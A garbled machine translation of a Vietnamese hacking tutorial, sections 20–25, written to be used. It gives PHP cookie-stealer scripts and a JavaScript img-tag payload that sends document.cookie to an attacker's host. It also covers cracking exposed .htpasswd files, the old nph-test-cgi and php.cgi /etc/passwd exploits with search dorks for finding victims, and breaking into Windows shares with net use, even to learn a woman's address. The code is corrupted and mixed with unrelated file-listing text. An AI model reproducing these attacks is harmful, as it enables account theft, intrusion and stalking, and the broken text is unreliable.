20. What is a cookie?
Cookies are small pieces of structured data shared between the web site and the user's browser. Cookies are stored under small text files (size less than 4k). They are created by sites to store / retrieve information about users who visited the site and where they went through the site.
This information may include user names, passwords, preferences, habits, etc. Cookies are accepted by the user's browser on his / her hard disk, not all browsers support cookies. . After a visit to the site, the information about the user is stored in the cookie. At the next visit to the site, the site may reuse the information in the cookie (such as information related to logging into a forum ...) that do not have to re-do the login or right. re-enter other information. The problem is that many sites manage the reuse of information stored in cookies is not accurate, incomplete check or encrypt the information in the cookie and loopholes to help hackers to break through the post. enter, take control of the site.
Cookies usually contain the following ingredients:
+ Name: by the web site programmer
Domain is the domain from which the cookie is created and sent
+ Path: information about the path at the web site you are viewing
Expiration Date: The date when the cookie expires.
Security: If this value is set inside the cookie, the information will be encrypted during transmission between the server and the browser.
Other values: These are the specific data that the web server stores for later identification. These values do not contain whitespace, dots, and semicolons, and are limited to 4k.
(Documents from Viethacker.net)
21. The cookie stealing technique
First, open notepad and then copy the following code into notepad:
CODE
& lt;? php
define (`` LINE``, `` rn``);
define (`` HTML_LINE``, ``
``);
function getvars ($ arr, $ title)
$ res = `` ``;
$ len = count ($ arr);
if ($ len & gt; 0)
if (strlen ($ title) & gt; 0)
print (`` [-------- $ title --------] `` .HTML_LINE);
$ res. = `` [-------- $ title --------] ``. LINE;
foreach ($ arr as $ key = & gt; $ value)
print (`` [$ key] ``. HTML_LINE);
In ($ arr [$ key] .HTML_LINE);
$ res. = `` [$ key] ``. LINE . $ arr [$ key]. LINE;
return $ res;
// get current date
$ now = date (`` Y-m-d H: i: s``);
// init
$ myData = `` [----- $ now -----] ``. LINE;
// get
$ myData. = getvars ($ HTTP_GET_VARS, `` ``);
// file
$ file = $ REMOTE_ADDR. `` .txt``;
$ mode = `` r + ``;
if (! file_exists ($ file))
$ mode = `` w + ``;
$ fp = fopen ($ file, $ mode);
fseek ($ fp, 0, SEEK_END);
fwrite ($ fp, $ myData);
fclose ($ fp);
1 & gt;
or
CODE
& lt;? php
if ($ contents & amp; $ header) {
mail (`` victim @ yahoo.com``, `` from mail script``, $ contents, $ header)
die (`could not email it`);
sleep (2);
1 & gt;
& lt; script language = javascript & gt;
& lt;? php
} else {
echo `` nope``;
(Please correct victim@yahoo.com to your Mail address).
Save this notepad as "& lt; your name & gt; .php "and then upload to a host that supports PHP, in my example is abc.php (for you have done the Web will be very easy right?). This snippet will steal the victim's information (and possibly cookies) when they open the data that contains the code and automatically save that information as a file. victim's ip & gt; .txt
There is another way to get cookies used in the forum is error but not fix, when posting you need to add the following code to your post:
CODE
document.write (` )
with host_php: is the address you have uploaded the file stealing that cookie.
and abc.php is my VD file.
For example: when applied in the img tag, we use the following:
CODE
`) & gt;
or:
[CODE
img] javascript: Document.write (`& amp; # x3cimg src = http: //host_php/docs.php? docs =` + escape (document .cookie) + `& amp; # x3e`)" & gt;
_ You can find web pages to practice in this tutorial by going to google.com to find these faulty forums with the keyword `` Powered by ...... .. forum 'with the following forums: iconboard, Ultimate Bulletin Board, vBulletin Board, Snitz. If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed.
There are also many code to steal cookies well, you find yourself more.
22. How to disable password protected Website
When you search for information on a Web site, there are some places on the Web site when you enter will be blocked and will appear a box asking for a password, this is the private area. Keep confidential information only for the number of people or groups of people (the hacking place of viethacker.net that e-chip said for example). When we click on the link (usually) it will call to .htpasswd and .htaccess located in the same directory to protect the site. Why use the dot in front of the `.htaccess` filename? Files whose names start with a `.` dot are viewed by web servers as configuration files. These files will be hidden when you browse through the protected .htaccess file. This profile is responsible for controlling the access to the secure link you want to access. A password manager and user name, a task manager that encrypts the information for the other file. When you enter the correct two then the new link opens. Take a look at the following:
CODE
Graham: F # .DG 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com m38d% RF
Webmaster: GJA54j.3g9 # $ @ f
Username can be read, but the pass you see there is no motive 1 Of course not. Do you understand why you can not read them? This one has the interference of the .htaccess file. Since they are in the same directory they interact with each other to protect each other so we are not foolishly trying to break in and crack the password damn it (when no password crack tools in hand I am also researching to be able to directly penetrate, if successful I will post for you. The error is here, what happens if the .htpasswd is outside of the protected directory with the. Htaccess 1 file? We will steal it easily, see the following link:
http://www.company.com/cgi-bin/pro tected /
Check if the .htpasswd file is protected by .htaccess or not, enter the following URL:
http://www.company.com/cgi-bin/pro tected / .htpasswd
If you find a `File not found` or similar answer, make sure the file is unprotected, find it using one of the following URLs:
http://www.company.com/.htpasswd</ a & gt;
http://www.company.com/cgi-bin/.ht passwd
http://www.company.com/cgi-bin/pas swords / .htpasswd
http://www.company.com/cgi-bin/pas swd / .htpasswd
If you still do not see, then try to find other similar URLs (may be located in the root directory), until you find it offline.
Once you've found this file, use `` John the ripper`` or `` Crackerjack`` to crack passwd in it. Next thing you know what you have to do, get a valid user name and passwd to break into the riddle to see what you guys "confide" in it, but you also do not change the pass Do they stir?
This way you can also apply to get the admin pass because most of the members of the closed group are "authorized".
CGI is an abbreviation for the Common Gateway Interface. Most websites use CGI scripts to perform the necessary 24-hour tasks. The CGI scripts are essentially programs written and uploaded to Web sites in Perl, C, C ++, and Vbscript languages, where Perl is most popular for its ease of writing, Occupying a small capacity and especially it can run continuously for 24 hours a day.
Generally, CGI scripts are stored in the / cgi-bin / Web directory as in the following:
http://www.company.com/cgi-bin/log in.cgi
For specific tasks such as:
+ Create program to count the number of people visited.
Allows visitors to do what and can not do on your Website.
+ Manage user name and passwd of members.
Provides Mail service.
Provides linking and messaging services between members.
Provides detailed error messages.
24. The most basic Web hacking method through CGI scripts
Error # 1: nph-test-cgi error
+ Incorrect site name in your browser.
+ Type the last line at the end: / cgi-bin / nph-test-cgi
At that point on the URL you would look something like this:
http://www.servername.com/cgi-bin/ nph-test-cgi
If successful you will see the folders are stored inside. To see which folder you continue:
CODE
& lt; name / & gt; / bin / boot / build / dev / etc / home /initrd.img/lib/lib64/ lost + found / media / mnt / mysqltmp / / var / vmlinuz
+ The file containing the passwd is usually located in the / etc directory, and you type in the following URL:
http://www.servername.com/cgi-bin/ nph-test-cgi? / etc / 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com
Error 2: php.cgi error
Similar to the above you just type in the following URL to get pass:
http://www.servername.com/cgi-bin/ php.cgi? / etc / passwd
Important is that these are old errors should find the site for you to practice very hard, you go to google.com and then type keywords:
/cgi-bin/php.cgi?/etc/passwd]
or cgi-bin / nph-test-cgi? / etc
Then you look on that page to try to fix the error to practice offline.
25. Computer penetration techniques are available online
Accessing your computer online is a difficult and difficult technique. You can say easy when you use the ENT tool 3 but you will have problems using it as the speed of use on the victim machine will be significantly slow and the machine they do not share is not invasive. So if they shut down, they will get a crash when they do not have the account, have a smoother, less speed down and can penetrate when the victim does not share is to use DOS program. attack . Ok, I'll start:
Use an IP scanner like ENT 3 to scan the target IP.
_ Go to Start == & gt; Type the command cmd.
In the DOS window type "net view"
CODE
For example: c: net view 203.162.30.xx
You look at the results, if it has a share is too easy, you just type the command
net use & lt; any drive on your computer & gt; : & lt; victim's share & gt;
For example: c: net use E: 203.162.30.xxC
If you connect to the victim machine that requires Passwd, then download passwd passwd for use (in my case you load the program "pqwak2" applies to the passwd pass on the computer using Win98 or Winme and the "xIntruder" program for Win NT. Note that using two similar programs, the first line we hit the IP of the victim, the second line we type the victim's share drive, but for "xIntruder" we pay attention to its Delay for In the LAN, its Delay is 100 and the Internet is over 5000.
If the victim's machine does not have a share, then type:
net use & lt; any drive on your computer & gt; : c $ (or d $) `` administrator``
For example: net use E: 203.162.30.xxC $ `` administrator``
The c $ default is the default for all USER `` administrators``.
We can use this method to break into the machine of the friend whom she secretly remember to find the data related to her address (provided she is using the machine at home and you are lucky to find that address). You just need to chat Y! Mass then DOS command:
c: netstat -n
When you use this method, turn off all other windows just to frame Y! Mass with her, it will make it easier for you to determine her IP address. Then you use the intrusion that I mentioned above. (Perhaps our old tycoon flirted with her in the remote network also used this way to break through and find out her address here. where, hi`hi`.)
You will succeed if your victim machine does not have a firewall or proxy installed.
================================================== = =
Many of you have asked me to give you the exact address for the internship, but I can not give it out because of the experience of the instructions have the correct address, when you practice to get the admin rights have. You deleted their database. As such, HVA is known to be the source of online vandalism. If you can, I'll just show you how to find those faults and not give them a specific address.
================================================== = =
In Part 4, I will discuss the technique of breaking into your computer when you are online, learn the steps when deciding to hack a Web page, techniques to find fault Web site to practice, hacking techniques Web through Gallery.vv errors.
GOOKLUCK !!!!!!!!!
